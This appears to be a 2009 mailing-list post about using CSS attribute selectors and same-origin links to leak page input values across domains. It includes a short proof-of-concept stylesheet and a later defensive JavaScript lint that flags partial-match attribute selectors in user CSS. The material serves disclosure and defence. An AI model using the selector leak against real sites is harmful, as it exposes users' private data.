Same origin CSS selector attacks

Hi All

Another attack vector not discussed is to use same origin URLs to gather
data of HTML values. If you can use a reference to a URL on the same site
and influence part of its value then you can use that data.
So let's say a site allows selectors, display and a normal <a href> (same
origin) link.

Then you can do:
<style>
a {
    display:none;
}
input[value*="ab1"] + a {
    display:block;
}
input[value*="cd1"] + a + a {
    display:block;
}
input[value*="ef1"] + a + a + a {
    display:block;
}
</style>

<input value="cd1xxx" />

<a href="#ab1">ab1</a>

<a href="#cd1">cd1</a>

<a href="#ef1">ef1</a>

This data can be gathered from any site at any point as long as the history
hasn't been cleared. This obviously isn't going to work for brute-forcing
tokens but could be used for simple information disclosure across domains.

Received on Thursday, 10 December 2009 09:28:18 UTC
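As an added example (not part of the message above, and not code from any project it discusses), here is a small lint that a site accepting user-supplied stylesheets could run before accepting them: it flags the partial-match attribute selectors (`*=`, `^=`, `$=`) that the technique above depends on, so a policy can reject or review such rules. The function and constant names are my own; the sample stylesheet is the one from the message, embedded inline.

```javascript
// Attribute selectors that match on a partial value: [attr*=v], [attr^=v], [attr$=v].
// These let a stylesheet react to fragments of an input's value, which is the
// information-disclosure primitive shown in the message above.
const PARTIAL_ATTR = /\[\s*([\w-]+)\s*([*^$])=\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*\]/g;

// Split a flat stylesheet into { selector, body } rules. Comments are stripped
// first; nested at-rules (@media etc.) are out of scope for this simple check.
function splitRules(cssText) {
  const noComments = cssText.replace(/\/\*[\s\S]*?\*\//g, '');
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(noComments)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Return one finding per selector that uses a partial-match attribute selector,
// listing the attribute names and operators involved. An empty array means the
// stylesheet contains none of these selectors.
function findPartialAttributeSelectors(cssText) {
  const findings = [];
  for (const rule of splitRules(cssText)) {
    for (const sel of rule.selector.split(',')) {
      const s = sel.trim();
      const matches = [...s.matchAll(PARTIAL_ATTR)];
      if (matches.length === 0) continue;
      findings.push({
        selector: s,
        attributes: matches.map((x) => x[1]),
        operators: matches.map((x) => x[2] + '='),
      });
    }
  }
  return findings;
}

// Constructed sample: the stylesheet from the message above, without <style> tags.
const SAMPLE_CSS = `
a { display:none; }
input[value*="ab1"] + a { display:block; }
input[value*="cd1"] + a + a { display:block; }
input[value*="ef1"] + a + a + a { display:block; }
`;

// Constructed sample of ordinary user styling that should pass.
const BENIGN_CSS = `a { color: #336699; } .note, p.intro { font-weight: bold; }`;
```

A hosting site could treat any non-empty result as grounds to reject the stylesheet, or restrict attribute selectors to a whitelist of harmless attributes such as `class`.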